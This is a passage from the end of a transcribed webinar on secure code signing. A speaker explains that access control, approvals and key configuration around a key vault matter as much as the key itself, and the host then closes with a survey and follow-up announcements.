co cosigning infrastructure itself is secure. So Azure Key Vault will definitely, you know, secure a key, but if you don't have control over who has access to that key within Azure Key Vault, then your infrastructure is no longer secured for accessing that key and then compromise can can occur. So when we talk about secure code signing, we're talking about having an infrastructure in place that controls what people have access, what what controls what people need to approve that access, controls the configuration of the keys and the certificates, where the certificates come from, the time of day that they can be accessed, things like that. So that's what we need, and and it's really meant to to make the infrastructure around code signing robust versus just the cosigning, taking a private key and and cosigning an artifact. Excellent. Thank you, Maddie. Thanks everyone for joining us today. I hope you learned a little bit on today's webinar. We're we'll launch a survey now. If you have any questions, comments that didn't get addressed, or if you'd like to see a specific topic in the future, we'd love to hear about it. Again, we'll be sending out the recording after the webinar, and we will also, be sending out the the NIST matrix that we're we're putting together for you. So, please stay tuned for that, and thanks again for joining us. Talk to you soon. Thank you, everyone.